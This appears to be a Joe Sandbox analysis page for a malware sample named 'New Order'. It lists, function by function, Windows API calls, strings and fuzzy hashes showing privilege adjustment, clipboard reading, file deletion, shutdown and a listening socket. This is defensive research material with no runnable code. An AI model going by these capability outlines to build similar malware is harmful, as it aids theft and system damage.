Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7865470cd7bbe855d0187508060a051c04a10ef4479eefbd1fd79c68dd78040e
Instruction ID: 917601138f125df36f556679308cf0f5b98103a4d181704c259bc4865adb8f0c
Opcode Fuzzy Hash: 7865470cd7bbe855d0187508060a051c04a10ef4479eefbd1fd79c68dd78040e
Instruction Fuzzy Hash: EB31E671A50318BFEB226BB24C4AFBF7E6CEB48B15F100065F600E61E1D7B05D40EAA0

Function 00321201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 003216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032170D
Part of subcall function 003216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032173A
Part of subcall function 003216C3: GetLastError.KERNEL32 ref: 0032174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00321286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003212A8
CloseHandle.KERNEL32(?), ref: 003212B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003212D1
GetProcessWindowStation.USER32 ref: 003212EA
SetProcessWindowStation.USER32(00000000), ref: 003212F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00321310

Part of subcall function 003210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003211FC), ref: 003210D4
Part of subcall function 003210BF: CloseHandle.KERNEL32(?,?,003211FC), ref: 003210E9

Strings

default, xrefs: 0032130B
Z8, xrefs: 00321392
winsta0, xrefs: 003212CC
, xrefs: 0032125A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z8
API String ID: 22674027-3687362306
Opcode ID: 6133ab942c6ae7a31965884787b9f98d6ed222b8bbdb1946ef7f0848c20e3f57
Instruction ID: 858956dad6881fbd20ba286a9c0ec3da6b911249b9d98f330a2a085c4fed3d24
Opcode Fuzzy Hash: 6133ab942c6ae7a31965884787b9f98d6ed222b8bbdb1946ef7f0848c20e3f57
Instruction Fuzzy Hash: 2C81BF71910318AFDF22AFA5ED49FEE7BBDEF04704F184129F915A61A0C7758A44CB60

Function 00320B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00321114
Part of subcall function 003210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321120
Part of subcall function 003210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 0032112F
Part of subcall function 003210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321136
Part of subcall function 003210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00320BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00320C00
GetLengthSid.ADVAPI32(?), ref: 00320C17
GetAce.ADVAPI32(?,00000000,?), ref: 00320C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00320C6D
GetLengthSid.ADVAPI32(?), ref: 00320C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00320C8C
HeapAlloc.KERNEL32(00000000), ref: 00320C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00320CB4
CopySid.ADVAPI32(00000000), ref: 00320CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00320CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00320D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00320D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320D45
HeapFree.KERNEL32(00000000), ref: 00320D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320D55
HeapFree.KERNEL32(00000000), ref: 00320D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00320D65
HeapFree.KERNEL32(00000000), ref: 00320D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00320D78
HeapFree.KERNEL32(00000000), ref: 00320D7F

Part of subcall function 00321193: GetProcessHeap.KERNEL32(00000008,00320BB1,?,00000000,?,00320BB1,?), ref: 003211A1
Part of subcall function 00321193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00320BB1,?), ref: 003211A8
Part of subcall function 00321193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00320BB1,?), ref: 003211B7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ff9da98913915d7ff79441097632750276d7704d3d3b36cb770221eb67b67391
Instruction ID: fce9cc895154bcb460c47414db0b7ca0c109c16186332f8a59064f73b066c021
Opcode Fuzzy Hash: ff9da98913915d7ff79441097632750276d7704d3d3b36cb770221eb67b67391
Instruction Fuzzy Hash: BD718C7190132AAFDF169FA4EC44BAEBBBCFF04315F054115E914A72A2D771AA09CF60

Function 0033EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0035CC08), ref: 0033EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0033EB37
GetClipboardData.USER32(0000000D), ref: 0033EB43
CloseClipboard.USER32 ref: 0033EB4F
GlobalLock.KERNEL32(00000000), ref: 0033EB87
CloseClipboard.USER32 ref: 0033EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0033EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0033EBC9
GetClipboardData.USER32(00000001), ref: 0033EBD1
GlobalLock.KERNEL32(00000000), ref: 0033EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0033EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0033EC38
GetClipboardData.USER32(0000000F), ref: 0033EC44
GlobalLock.KERNEL32(00000000), ref: 0033EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0033EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0033EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0033ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0033ECF3
CountClipboardFormats.USER32 ref: 0033ED14
CloseClipboard.USER32 ref: 0033ED59

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 5c81fa51540d283dab2b40678c771c6c3ac0c478a076094e9c07f0e383ebfe8f
Instruction ID: f2d98583458f7a2a347fe5d9f6da7290812777f395606949d87cf5c54ef438a9
Opcode Fuzzy Hash: 5c81fa51540d283dab2b40678c771c6c3ac0c478a076094e9c07f0e383ebfe8f
Instruction Fuzzy Hash: 3861C0352043019FD302EF24D899F7AB7A8AF84708F19555DF4569B2E1CB31D945CBA2

Function 0033698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003369BE
FindClose.KERNEL32(00000000), ref: 00336A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00336A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00336A75

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00336AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00336ADF

Strings

%4d, xrefs: 00336BB1
%02d, xrefs: 00336C00, 00336C0A, 00336C5A, 00336CAA, 00336CFA, 00336D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00336B32
%03d, xrefs: 00336DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00336B6A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 105ba58e84d405c03430944f0e8b228fde7330bdf6e491d9311d1b3562edb9e0
Instruction ID: 84b08eb14a32b19b1d410ab5d9091b0d5c99af33c72be0226a964adf3b670c4a
Opcode Fuzzy Hash: 105ba58e84d405c03430944f0e8b228fde7330bdf6e491d9311d1b3562edb9e0
Instruction Fuzzy Hash: 6FD17272518300AFC711EBA4C986EAFB7ECAF88704F044A1EF585D7191EB74DA54CB62

Function 00339642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00339663
GetFileAttributesW.KERNEL32(?), ref: 003396A1
SetFileAttributesW.KERNEL32(?,?), ref: 003396BB
FindNextFileW.KERNEL32(00000000,?), ref: 003396D3
FindClose.KERNEL32(00000000), ref: 003396DE
FindFirstFileW.KERNEL32(*.*,?), ref: 003396FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0033974A
SetCurrentDirectoryW.KERNEL32(00386B7C), ref: 00339768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00339772
FindClose.KERNEL32(00000000), ref: 0033977F
FindClose.KERNEL32(00000000), ref: 0033978F

Strings

*.*, xrefs: 003396F5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 3a55356eb206d2644ccba572318cb28858358cd9ea4e5316bc2c4ad1c1557f50
Instruction ID: 2edd1caadb54d32e26d83db0029462e3dfc4d62a8aa99205981c3a20dda82e42
Opcode Fuzzy Hash: 3a55356eb206d2644ccba572318cb28858358cd9ea4e5316bc2c4ad1c1557f50
Instruction Fuzzy Hash: 1031B03255131AAEDF12AFB5DC89BDE77AC9F09326F104196F905E21A0DB74DD448E10

Function 0033979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003397BE
FindNextFileW.KERNEL32(00000000,?), ref: 00339819
FindClose.KERNEL32(00000000), ref: 00339824
FindFirstFileW.KERNEL32(*.*,?), ref: 00339840
SetCurrentDirectoryW.KERNEL32(?), ref: 00339890
SetCurrentDirectoryW.KERNEL32(00386B7C), ref: 003398AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 003398B8
FindClose.KERNEL32(00000000), ref: 003398C5
FindClose.KERNEL32(00000000), ref: 003398D5

Part of subcall function 0032DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0032DB00

Strings

*.*, xrefs: 0033983B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: b1c997e5d6744edfb98e0e261d3065a48453646beac58d65cff262e3a07a96c9
Instruction ID: 5af0887f5d4b5b9f093dfbd8afdb85c0f23afcbc92db2505d9b7df47ae5b35ce
Opcode Fuzzy Hash: b1c997e5d6744edfb98e0e261d3065a48453646beac58d65cff262e3a07a96c9
Instruction Fuzzy Hash: 3231F43255031AAEDF12EFB5EC89BDE77AC9F46329F104156E810A61A0DBB0DD44CF20

Function 00338195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00338257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00338267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00338273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00338310
SetCurrentDirectoryW.KERNEL32(?), ref: 00338324
SetCurrentDirectoryW.KERNEL32(?), ref: 00338356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0033838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00338395

Strings

*.*, xrefs: 0033839B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 98da9f740e1499cbdaa30f6738f2de97aa086f342ec5c0ff33ed9653920b37c1
Instruction ID: 30421df39bbac56066e468fcc2a7142a2d5feb579569e153346d332cba9b777c
Opcode Fuzzy Hash: 98da9f740e1499cbdaa30f6738f2de97aa086f342ec5c0ff33ed9653920b37c1
Instruction Fuzzy Hash: 826168765143059FCB11EF60C881AAEB3E8FF89324F04892EF98987251DB31E955CF92

Function 0032D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 002C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C3A97,?,?,002C2E7F,?,?,?,00000000), ref: 002C3AC2

Part of subcall function 0032E199: GetFileAttributesW.KERNEL32(?,0032CF95), ref: 0032E19A

FindFirstFileW.KERNEL32(?,?), ref: 0032D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0032D1DD
MoveFileW.KERNEL32(?,?), ref: 0032D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0032D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0032D237

Part of subcall function 0032D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0032D21C,?,?), ref: 0032D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0032D253
FindClose.KERNEL32(00000000), ref: 0032D264

Strings

\*.*, xrefs: 0032D0CD, 0032D0D6, 0032D0EB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 425c733243a2d25bd9aea5cc8a2cf053e7e34b6e5b9e041c3902853d35c0d892
Instruction ID: f6a40def14a121b05db6b1ffdb45547233c63fb80e0430cb7bacf09116b1b90c
Opcode Fuzzy Hash: 425c733243a2d25bd9aea5cc8a2cf053e7e34b6e5b9e041c3902853d35c0d892
Instruction Fuzzy Hash: 8261403180125D9ECF06EBE0D952EEDB779AF15304F244669E40277191EB30AF59CF61

Function 0033ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0033ED91
EmptyClipboard.USER32 ref: 0033ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0033EDAC
CloseClipboard.USER32 ref: 0033EEA3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0d5545b5fd7bba5ebfe1859b3193a4fb8f66f18a43b5a2ef4a048b5e49f6d3e3
Instruction ID: a053e6e9a4f699dd9a88f8c91875337f45dff69137280096ac2d4873dc6a6044
Opcode Fuzzy Hash: 0d5545b5fd7bba5ebfe1859b3193a4fb8f66f18a43b5a2ef4a048b5e49f6d3e3
Instruction Fuzzy Hash: B741CE35214211AFE722DF15D888F2ABBE9EF44319F15C09DE4199BAB2C735ED42CB90

Function 0032E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 003216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032170D
Part of subcall function 003216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032173A
Part of subcall function 003216C3: GetLastError.KERNEL32 ref: 0032174A

ExitWindowsEx.USER32(?,00000000), ref: 0032E932

Strings

@, xrefs: 0032E925
, xrefs: 0032E920
, xrefs: 0032E95C
SeShutdownPrivilege, xrefs: 0032E902

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: a07987a6ae6effa4610f66347c41def9947590d9b82ebd0ac5bc4f36e5d2c432
Instruction ID: 53abe0d3b2196fe61ef63d09699358fabce928d06f292be656521fd76f8e0e4e
Opcode Fuzzy Hash: a07987a6ae6effa4610f66347c41def9947590d9b82ebd0ac5bc4f36e5d2c432
Instruction Fuzzy Hash: 97012632620330AFEB5622B4BC8BBBF725CA714745F160823FC12E20E1D7A85C808290

Function 00341204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00341276
WSAGetLastError.WSOCK32 ref: 00341283
bind.WSOCK32(00000000,?,00000010), ref: 003412BA
WSAGetLastError.WSOCK32 ref: 003412C5
closesocket.WSOCK32(00000000), ref: 003412F4
listen.WSOCK32(00000000,00000005), ref: 00341303
WSAGetLastError.WSOCK32 ref: 0034130D
closesocket.WSOCK32(00000000), ref: 0034133C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 2d0c6527586d28bba937205519a09fad4e63697dc2dcebaee50ac11b32fb7905
Instruction ID: 085ed6f2446112f215b421e7317b6560669745821d0b0de3baf7e6826be3b32a
Opcode Fuzzy Hash: 2d0c6527586d28bba937205519a09fad4e63697dc2dcebaee50ac11b32fb7905
Instruction Fuzzy Hash: FB418E35A006009FD711DF64C488B2ABBE5AF46318F198588E8568F3A6C771FC81CBA1

Function 002FB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002FB9D4
_free.LIBCMT ref: 002FB9F8
_free.LIBCMT ref: 002FBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00363700), ref: 002FBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0039121C,000000FF,00000000,0000003F,00000000,?,?), ref: 002FBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00391270,000000FF,?,0000003F,00000000,?), ref: 002FBC36
_free.LIBCMT ref: 002FBD4B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: c4ee31f1583f181380b40252796a617205556520c8c06669c72742cfe6900fc8
Instruction ID: 67fd35bdd01b5a347e76d5424761e6e7688f80f29a841ad1df9a519f51387452
Opcode Fuzzy Hash: c4ee31f1583f181380b40252796a617205556520c8c06669c72742cfe6900fc8
Instruction Fuzzy Hash: 40C1397192420E9FDB12AF78DC41ABAFBB8EF41390F1441BAEA94D7251E7708E11CB50

Function 0032D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 002C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C3A97,?,?,002C2E7F,?,?,?,00000000), ref: 002C3AC2

Part of subcall function 0032E199: GetFileAttributesW.KERNEL32(?,0032CF95), ref: 0032E19A

FindFirstFileW.KERNEL32(?,?), ref: 0032D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0032D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0032D481
FindClose.KERNEL32(00000000), ref: 0032D498
FindClose.KERNEL32(00000000), ref: 0032D4A1

Strings

\*.*, xrefs: 0032D3F2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d668bcf91e67bdac7973867377001f6f334096d4ed9d51a856b77c02e515cd45
Instruction ID: a535beccfa8fb0cdc79abfb0d6b4f6d0f43611bd108c75c206965d6ec794ab93
Opcode Fuzzy Hash: d668bcf91e67bdac7973867377001f6f334096d4ed9d51a856b77c02e515cd45
Instruction Fuzzy Hash: 79316D310283959FC606EF64D896DAFB7A8AE95304F444E1DF4D1931A1EB30AA198B63

